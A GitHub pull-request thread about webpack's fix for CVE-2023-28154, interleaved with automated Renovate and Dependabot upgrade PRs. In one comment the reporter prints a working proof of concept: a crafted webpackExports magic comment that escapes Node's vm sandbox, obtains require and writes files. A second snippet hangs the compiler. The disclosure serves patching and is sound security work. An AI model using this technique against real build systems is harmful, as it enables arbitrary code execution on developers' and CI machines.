-   [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made their first contribution in [webpack/webpack#16703
-   [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first contribution in [webpack/webpack#16493
-   [@&#8203;askoufis](https://togithub.com/askoufis) made their first contribution in [webpack/webpack#16781

**Full Changelog**: webpack/webpack@v5.75.0...v5.76.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://app.renovatebot.com/dashboard#github/weareinreach/InReach).



PR-URL: #278
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@Jack-Works
Copy link
Contributor Author

finally a new release! this PR is actually a security fix. can I reveal the detail now?

@Jack-Works Jack-Works changed the title refactor: avoid cross-realm objects security: avoid cross-realm objects Mar 9, 2023
@alexander-akait
Copy link
Member

@Jack-Works Yeah, time to update webpack with the security problem

@Jack-Works
Copy link
Contributor Author

webpack has a feature called magic comment, it looks like this:

import(
  /* webpackChunkName: "my-chunk-name" */
  /* webpackMode: "lazy" */
  /* webpackExports: ["default", "named"] */
  'module'
);

This comment can be any arbitrary JavaScript code. It accepts strings, arrays, and RegExp, here is where we dive in. Note: I'll reference the commit before this PR.

Webpack executes the magic comment using the Node's vm module.

const val = vm.runInNewContext(`(function(){return {${value}};})()`);

This is very subtle and easy to make a fragile "sandbox" and webpack actually made a mistake here.

importOptions.webpackExports.every(
item => typeof item === "string"
))

Here it access "every" property from an untrusted object and passes a function in. By crafting the following code, we can get access to the real global object:

const source = import(/* webpackExports: ((() => {
    const array = ["a"]
    array.every = function (fun) {
        //                  ~~~ provided by webpack
        const realGlobalThis = fun.constructor('return this')()
        //                     ~~~~~~~~~~~~~~~ the real Function
        const require =
realGlobalThis.process.mainModule.constructor.createRequire(realGlobalThis.process.argv[1])
        //    ~~~~~~~ full power! now we can do anything we want.
        const fs = require("fs")
        const path = require("path")
        fs.writeFileSync(path.join(realGlobalThis.process.cwd(),
"test.txt"), "oops")
        return Reflect.apply(Array.prototype.every, array, [fun])
    }
    return array
})()) */ './next.js')

This PR ensures values from the VM are being sanitized by JSON.parse(JSON.stringify(val)). It's still possible to hang the compiler forever by writing the following code, but it's less dangerous.

const source = import(/* webpackExports: ((() => {
    while (true) {}
})()) */ './next.js')

@alexander-akait
Copy link
Member

@Jack-Works Good investigation, thank you, do you want to open CVE for it?

@Jack-Works
Copy link
Contributor Author

yes I have already requested one, let's wait

@ljharb
Copy link

ljharb commented Mar 10, 2023

@Jack-Works which versions of webpack are affected? Just 5, or also older majors?

@Jack-Works
Copy link
Contributor Author

@Jack-Works which versions of webpack are affected? Just 5, or also older majors?

Older majors are also affected.

@ljharb
Copy link

ljharb commented Mar 10, 2023

Given that v4 has ~9.8M downloads/week compared to v5's ~10M, i dearly hope this fix is backported to v4.

@alexander-akait
Copy link
Member

@ljharb @Jack-Works I think v4 is not affected https://github.com/webpack/webpack/blob/v4.46.0/lib/dependencies/ImportParserPlugin.js

@Jack-Works
Copy link
Contributor Author

Jack-Works commented Mar 14, 2023

@Jack-Works Good investigation, thank you, do you want to open CVE for it?

it's CVE-2023-28154

@addaleax
Copy link
Contributor

addaleax commented Mar 15, 2023

@sokra If there’s a related security issue on top of this, what’s the best way to reach out to you privately? (Edit: Reached out to webpack@opencollective.com)

@Suraj-Bhandarkar-S
Copy link

Upgrading the web pack version will fix the issue?

@alexander-akait
Copy link
Member

Yes, just update webpack

@jadepam
Copy link

jadepam commented Mar 16, 2023

@ljharb @Jack-Works 我认为 v4 不受影响https://github.com/webpack/webpack/blob/v4.46.0/lib/dependencies/ImportParserPlugin.js

不对,v4也是受影响的:具体看parseCommentOptions方法
https://github.com/webpack/webpack/blob/v4.46.0/lib/Parser.js

@alexander-akait
Copy link
Member

alexander-akait commented Mar 16, 2023

@jadepam Yeah, looks like it was in another file, we need backport, we will realy soon (today/tomorrow, need a small discussion)

oliverchang pushed a commit to google/osv.dev that referenced this pull request Mar 20, 2023
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack](https://togithub.com/webpack/webpack) | [`5.75.0` ->
`5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.75.0/5.76.0) |
[![age](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/age-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/compatibility-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/confidence-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

#### [CVE-2023-28154](https://nvd.nist.gov/vuln/detail/CVE-2023-28154)

Webpack 5 before 5.76.0 does not avoid cross-realm object access.
ImportParserPlugin.js mishandles the magic comment feature. An attacker
who controls a property of an untrusted object can obtain access to the
real global object.

---

### Release Notes

<details>
<summary>webpack/webpack</summary>

###
[`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare
Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

- Avoid cross-realm object access by
[@&#8203;Jack-Works](https://togithub.com/Jack-Works) in
[webpack/webpack#16500
- Improve hash performance via conditional initialization by
[@&#8203;lvivski](https://togithub.com/lvivski) in
[webpack/webpack#16491
- Serialize `generatedCode` info to fix bug in asset module cache
restoration by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[webpack/webpack#16703
- Improve performance of `hashRegExp` lookup by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[webpack/webpack#16759

#### Features

- add `target` to `LoaderContext` type by
[@&#8203;askoufis](https://togithub.com/askoufis) in
[webpack/webpack#16781

#### Security

- [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488)
fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan)
in
[webpack/webpack#16446

#### Repo Changes

- Fix HTML5 logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[webpack/webpack#16614
- Replace TypeScript logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[webpack/webpack#16613
- Update actions/cache dependencies by
[@&#8203;piwysocki](https://togithub.com/piwysocki) in
[webpack/webpack#16493

#### New Contributors

- [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first
contribution in
[webpack/webpack#16500
- [@&#8203;lvivski](https://togithub.com/lvivski) made their first
contribution in
[webpack/webpack#16491
- [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first
contribution in
[webpack/webpack#16614
- [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made
their first contribution in
[webpack/webpack#16446
- [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made
their first contribution in
[webpack/webpack#16703
- [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first
contribution in
[webpack/webpack#16493
- [@&#8203;askoufis](https://togithub.com/askoufis) made their first
contribution in
[webpack/webpack#16781

**Full Changelog**:
webpack/webpack@v5.75.0...v5.76.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" in timezone Australia/Sydney,
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://app.renovatebot.com/dashboard#github/google/osv.dev).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNC4xNTkuMSIsInVwZGF0ZWRJblZlciI6IjM0LjE1OS4xIn0=-->
@akcsi
Copy link

akcsi commented Mar 28, 2023

@alexander-akait Is Webpack 4 affected by this security issue? If yes, by when do we expect a backport?

@alexander-akait
Copy link
Member

@akcsi Not really, I wouldn't say it's a vulnerability - you shouldn't build code that you don't trust, for example - val-loader, some plugins and loaders execute code, even require("./code-to-be-executed.js!") will be a problem if you run it on untrusted code...

ob6160 added a commit to guardian/csnx that referenced this pull request Apr 5, 2023
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack](https://togithub.com/webpack/webpack) | [`5.75.0` ->
`5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.75.0/5.76.0) |
[![age](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/age-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/compatibility-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/confidence-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

#### [CVE-2023-28154](https://nvd.nist.gov/vuln/detail/CVE-2023-28154)

Webpack 5 before 5.76.0 does not avoid cross-realm object access.
ImportParserPlugin.js mishandles the magic comment feature. An attacker
who controls a property of an untrusted object can obtain access to the
real global object.

---

### Release Notes

<details>
<summary>webpack/webpack</summary>

###
[`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare
Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

- Avoid cross-realm object access by
[@&#8203;Jack-Works](https://togithub.com/Jack-Works) in
[webpack/webpack#16500
- Improve hash performance via conditional initialization by
[@&#8203;lvivski](https://togithub.com/lvivski) in
[webpack/webpack#16491
- Serialize `generatedCode` info to fix bug in asset module cache
restoration by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[webpack/webpack#16703
- Improve performance of `hashRegExp` lookup by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[webpack/webpack#16759

#### Features

- add `target` to `LoaderContext` type by
[@&#8203;askoufis](https://togithub.com/askoufis) in
[webpack/webpack#16781

#### Security

- [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488)
fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan)
in
[webpack/webpack#16446

#### Repo Changes

- Fix HTML5 logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[webpack/webpack#16614
- Replace TypeScript logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[webpack/webpack#16613
- Update actions/cache dependencies by
[@&#8203;piwysocki](https://togithub.com/piwysocki) in
[webpack/webpack#16493

#### New Contributors

- [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first
contribution in
[webpack/webpack#16500
- [@&#8203;lvivski](https://togithub.com/lvivski) made their first
contribution in
[webpack/webpack#16491
- [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first
contribution in
[webpack/webpack#16614
- [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made
their first contribution in
[webpack/webpack#16446
- [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made
their first contribution in
[webpack/webpack#16703
- [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first
contribution in
[webpack/webpack#16493
- [@&#8203;askoufis](https://togithub.com/askoufis) made their first
contribution in
[webpack/webpack#16781

**Full Changelog**:
webpack/webpack@v5.75.0...v5.76.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" in timezone Europe/London,
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Never, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://app.renovatebot.com/dashboard#github/guardian/csnx).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNC4xNjAuMCIsInVwZGF0ZWRJblZlciI6IjM0LjE2MC4wIn0=-->
@bpapez
Copy link

bpapez commented Apr 6, 2023

@alexander-akait Thank you for this answer. Can it at least be said that using webpack 4 has the same risk as webpack <5.76.0 regarding this security issue ?

otc-zuul bot pushed a commit to opentelekomcloud-infra/backstage that referenced this pull request Apr 6, 2023
Bump webpack from 5.75.0 to 5.76.1

Bumps webpack from 5.75.0 to 5.76.1.

Release notes
Sourced from webpack's releases.

v5.76.1
Fixed

Added assert/strict built-in to NodeTargetPlugin

Revert

Improve performance of hashRegExp lookup by @​ryanwilsonperkin in webpack/webpack#16759

v5.76.0
Bugfixes

Avoid cross-realm object access by @​Jack-Works in webpack/webpack#16500
Improve hash performance via conditional initialization by @​lvivski in webpack/webpack#16491
Serialize generatedCode info to fix bug in asset module cache restoration by @​ryanwilsonperkin in webpack/webpack#16703
Improve performance of hashRegExp lookup by @​ryanwilsonperkin in webpack/webpack#16759

Features

add target to LoaderContext type by @​askoufis in webpack/webpack#16781

Security

CVE-2022-37603 fixed by @​akhilgkrishnan in webpack/webpack#16446

Repo Changes

Fix HTML5 logo in README by @​jakebailey in webpack/webpack#16614
Replace TypeScript logo in README by @​jakebailey in webpack/webpack#16613
Update actions/cache dependencies by @​piwysocki in webpack/webpack#16493

New Contributors

@​Jack-Works made their first contribution in webpack/webpack#16500
@​lvivski made their first contribution in webpack/webpack#16491
@​jakebailey made their first contribution in webpack/webpack#16614
@​akhilgkrishnan made their first contribution in webpack/webpack#16446
@​ryanwilsonperkin made their first contribution in webpack/webpack#16703
@​piwysocki made their first contribution in webpack/webpack#16493
@​askoufis made their first contribution in webpack/webpack#16781

Full Changelog: webpack/webpack@v5.75.0...v5.76.0



Commits

21be52b Merge pull request #16804 from webpack/chore-patch-release
1cce945 chore(release): 5.76.1
e76ad9e Merge pull request #16803 from ryanwilsonperkin/revert-16759-real-content-has...
52b1b0e Revert "Improve performance of hashRegExp lookup"
c989143 Merge pull request #16766 from piranna/patch-1
710eaf4 Merge pull request #16789 from dmichon-msft/contenthash-hashsalt
5d64468 Merge pull request #16792 from webpack/update-version
67af5ec chore(release): 5.76.0
97b1718 Merge pull request #16781 from askoufis/loader-context-target-type
b84efe6 Merge pull request #16759 from ryanwilsonperkin/real-content-hash-regex-perf
Additional commits viewable in compare view



Maintainer changes
This version was pushed to npm by evilebottnawi, a new releaser for webpack since your current version.



Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

Reviewed-by: Artem Goncharov
@devd88
Copy link

devd88 commented Jun 21, 2023

Good find @Jack-Works !

From an exploitability perspective, does this only affect build process / machine / runner? My interpretation of the above is that an attacker would have to submit malicious input into the repo / CI/CD and it would only get executed at build time, on the build machine / runner. After webpack runs, the remaining static js bundles would not include any malicious code, right?

I noticed that your CVE was scored with network attack vector in NVD. https://nvd.nist.gov/vuln/detail/CVE-2023-28154
Can you help us understand where an attacker needs to be to exploit this? Did you select network because an attacker can submit code to github? The exploit would only be triggered by existing build process on the build machine / runner, right?

@Jack-Works
Copy link
Contributor Author

Good find @Jack-Works !

From an exploitability perspective, does this only affect build process / machine / runner? My interpretation of the above is that an attacker would have to submit malicious input into the repo / CI/CD and it would only get executed at build time, on the build machine / runner. After webpack runs, the remaining static js bundles would not include any malicious code, right?

This attack requires the code compiled is already malicious (therefore the output may not be clean already). Yes, it only attacks the builder, but the developer's computer is also a builder.

Did you select network because an attacker can submit code to github? The exploit would only be triggered by existing build process on the build machine / runner, right?

Yes. Yes.

kodiakhq bot pushed a commit to X-oss-byte/Canary-nextjs that referenced this pull request Sep 18, 2023
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack](https://togithub.com/webpack/webpack) | [`5.74.0` -> `5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.74.0/5.76.0) | [![age](https://developer.mend.io/api/mc/badges/age/npm/webpack/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/webpack/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/webpack/5.74.0/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/webpack/5.74.0/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

### GitHub Vulnerability Alerts

#### [CVE-2023-28154](https://nvd.nist.gov/vuln/detail/CVE-2023-28154)

Webpack 5 before 5.76.0 does not avoid cross-realm object access. ImportParserPlugin.js mishandles the magic comment feature. An attacker who controls a property of an untrusted object can obtain access to the real global object.

---

### Release Notes

<details>
<summary>webpack/webpack (webpack)</summary>

### [`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

-   Avoid cross-realm object access by [@&#8203;Jack-Works](https://togithub.com/Jack-Works) in [webpack/webpack#16500
-   Improve hash performance via conditional initialization by [@&#8203;lvivski](https://togithub.com/lvivski) in [webpack/webpack#16491
-   Serialize `generatedCode` info to fix bug in asset module cache restoration by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [webpack/webpack#16703
-   Improve performance of `hashRegExp` lookup by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [webpack/webpack#16759

#### Features

-   add `target` to `LoaderContext` type by [@&#8203;askoufis](https://togithub.com/askoufis) in [webpack/webpack#16781

#### Security

-   [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488) fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) in [webpack/webpack#16446

#### Repo Changes

-   Fix HTML5 logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [webpack/webpack#16614
-   Replace TypeScript logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [webpack/webpack#16613
-   Update actions/cache dependencies by [@&#8203;piwysocki](https://togithub.com/piwysocki) in [webpack/webpack#16493

#### New Contributors

-   [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first contribution in [webpack/webpack#16500
-   [@&#8203;lvivski](https://togithub.com/lvivski) made their first contribution in [webpack/webpack#16491
-   [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first contribution in [webpack/webpack#16614
-   [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made their first contribution in [webpack/webpack#16446
-   [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made their first contribution in [webpack/webpack#16703
-   [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first contribution in [webpack/webpack#16493
-   [@&#8203;askoufis](https://togithub.com/askoufis) made their first contribution in [webpack/webpack#16781

**Full Changelog**: webpack/webpack@v5.75.0...v5.76.0

### [`v5.75.0`](https://togithub.com/webpack/webpack/releases/tag/v5.75.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.74.0...v5.75.0)

### Bugfixes

-   `experiments.*` normalize to `false` when opt-out
-   avoid `NaN%`
-   show the correct error when using a conflicting chunk name in code
-   HMR code tests existance of `window` before trying to access it
-   fix `eval-nosources-*` actually exclude sources
-   fix race condition where no module is returned from processing module
-   fix position of standalong semicolon in runtime code

### Features

-   add support for `@import` to extenal CSS when using experimental CSS in node
-   add `i64` support to the deprecated WASM implementation

### Developer Experience

-   expose `EnableWasmLoadingPlugin`
-   add more typings
-   generate getters instead of readonly properties in typings to allow overriding them

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/sammyfilly/Canary-nextjs).
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Status: Shipped
Development

Successfully merging this pull request may close these issues.

None yet